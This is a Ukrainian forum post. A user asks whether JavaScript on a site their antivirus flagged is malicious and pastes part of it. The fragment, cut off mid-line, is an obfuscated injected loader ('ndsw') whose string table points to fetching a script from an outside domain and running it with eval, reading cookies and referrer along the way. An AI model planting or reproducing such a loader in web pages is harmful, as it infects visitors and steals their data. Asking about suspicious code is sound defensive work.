Тема: Вірусний JavaScript код?
Наткнувся на цей сайт коли працював на роботі.
Антивірус (Avira) спрацював на нього ще до того як зайшов на сайт, з гуглу прямо.
Проаналізував його в сервісі scanner.pcrisk.com
Ось звіт: https://scanner.pcrisk.com/detailed_rep … om#details
15 скриптів з потенційно шкідливим кодом.
Хтось може сказати чи це справді шкідливий код, чи це хибне спрацювання антивірусу.
Ось сам код:
[[;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//feddogroup.com/assets/bootstrapcarouselswipe/bootstrapcarouselswipe.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=